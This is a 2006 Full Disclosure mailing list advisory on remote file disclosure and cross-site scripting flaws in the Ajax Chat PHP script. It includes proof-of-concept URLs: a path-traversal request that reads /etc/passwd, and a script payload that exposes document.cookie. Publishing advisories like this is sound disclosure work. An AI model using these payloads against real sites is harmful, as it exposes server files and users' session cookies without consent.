Full Disclosure mailing list archives
Ajax Chat Multiple Vulnerabilities
From: SirDarckCat <sirdarckcat () gmail com>
Date: Sat, 29 Jul 2006 23:41:53 -0500
Discovered by Sirdarckcat from elhacker.net Ajax Chat http://www.pcdiscs.co.uk/chat/ ============================================== Ajax Chat is a web script for making an online chat based on PHP and AJAX. This has a Remote File Disclosure and a XSS bug. ============================================== RFD PoC: http://www.server.com/includes/operator_chattranscript.php?chatid=../../../../../../etc/passwd%00 ============================================== XSS PoC: http://www.server.com/visitor/livesupport/chat.php?userid=<script>alert(document.cookie)</script
============================================== Att. Sirdarckcat elhacker.net -- Att. SirDarckCat () GMail com http://www.google.com/search?q=sirdarckcat
Attachment:
ajaxchat.txt
Description:
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Ajax Chat Multiple Vulnerabilities SirDarckCat (Jul 29)